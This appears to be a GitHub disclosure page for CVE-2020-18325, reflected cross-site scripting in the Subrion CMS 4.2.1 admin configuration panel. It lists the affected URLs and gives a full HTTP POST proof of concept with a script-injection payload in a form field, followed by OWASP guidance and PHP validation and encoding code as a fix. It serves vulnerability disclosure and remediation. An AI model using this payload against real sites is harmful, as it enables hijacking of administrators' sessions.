hamm0nz/CVE-2020-18325

Multiple Cross-Site Scripting (XSS) vulnerabilities exist in the Configuration panel of Intelliants Subrion CMS v4.2.1.

Description

Subrion CMS is easy to install and simple to manage. Use it as a stand-alone application or in conjunction with other applications to create entry level sites, mid-sized or large sites.

Multiple Reflected Cross-site Scripting vulnerabilities were discovered in the Subrion CMS v.4.2.1 configuration panel, allowing a remote attacker to inject arbitrary JavaScript.

Date: 27-02-2022
Software Link: https://subrion.org
Exploit Author: HaMM0nz
CVE: CVE-2020-18325
Category: Web Application

Affected URL

  • /panel/configuration/pictures/
  • /panel/configuration/mail/
  • /panel/configuration/miscellaneous/
  • /panel/menus/add/

Proof of Concept

POST /panel/configuration/pictures/ HTTP/1.1
Host: 172.16.63.129
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.63.129/panel/configuration/pictures/
Content-Type: multipart/form-data; boundary=---------------------------17647740521660843247800008623
Content-Length: 5605
Connection: close
Cookie: INTELLI_7da515443a=2hen33trbsgsadue2rgcti4sr1; loader=loaded
Upgrade-Insecure-Requests: 1

-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="__st"

t9eQz0wrvfrlVO1rNDO9ZbPOB3mDmkNw8k17yS6f
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="c[image_quality]"

1
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[image_quality]"

75
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="c[allow_animated_gifs]"

1
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[allow_animated_gifs]"

0
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[allow_animated_gifs]"

test"><script>alert(1)</script>1qazx

Timeline

Discovery and report: 24 June 2019
CVE ID was assigned: 11 Aug 2021
Public: 27 February 2022

Solution

Follow the OWASP XSS prevention guidelines: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html
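
One way to apply that guidance to the fields in the request above, as an added example that is not Subrion's code or its patch: validate each setting against its expected type on input, and HTML-encode every value whenever the form is rendered again. The schema, ranges and function names are assumptions; only the field names and the test string come from this page.

```php
<?php
declare(strict_types=1);

// Hypothetical schema for two settings seen in the request above.
// The key names come from the page; the types and ranges are assumptions.
const CONFIG_SCHEMA = [
    'image_quality'       => ['type' => 'int', 'min' => 1, 'max' => 100],
    'allow_animated_gifs' => ['type' => 'bool'],
];

/** Return the validated value, or null when it does not match the schema. */
function validate_setting(string $key, $raw): ?int
{
    $rule = CONFIG_SCHEMA[$key] ?? null;
    if ($rule === null || !is_string($raw)) {
        return null; // unknown key, or an array smuggled in via v[key][]
    }
    if ($rule['type'] === 'bool') {
        return ($raw === '0' || $raw === '1') ? (int) $raw : null;
    }
    $n = filter_var($raw, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => $rule['min'], 'max_range' => $rule['max']],
    ]);
    return $n === false ? null : $n;
}

/** Encode for an HTML text node or a quoted attribute value. */
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Render a field; the submitted value is encoded even when it was rejected. */
function render_field(string $key, string $submitted): string
{
    $ok = validate_setting($key, $submitted) !== null;
    return sprintf('<input type="text" name="v[%s]" value="%s"%s>',
        e($key), e($submitted), $ok ? '' : ' class="is-invalid"');
}

// Constructed input: the last v[allow_animated_gifs] value from the request above.
$submitted = 'test"><script>alert(1)</script>1qazx';
var_dump(validate_setting('allow_animated_gifs', $submitted)); // rejected by the schema
echo render_field('allow_animated_gifs', $submitted), PHP_EOL;  // value stays inside the attribute
```

Validation alone is not the fix: the rejected value is still echoed back in the error view, so the encoding in `render_field()` is what keeps it inert.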

About

Exploit PoC for CVE-2020-18325
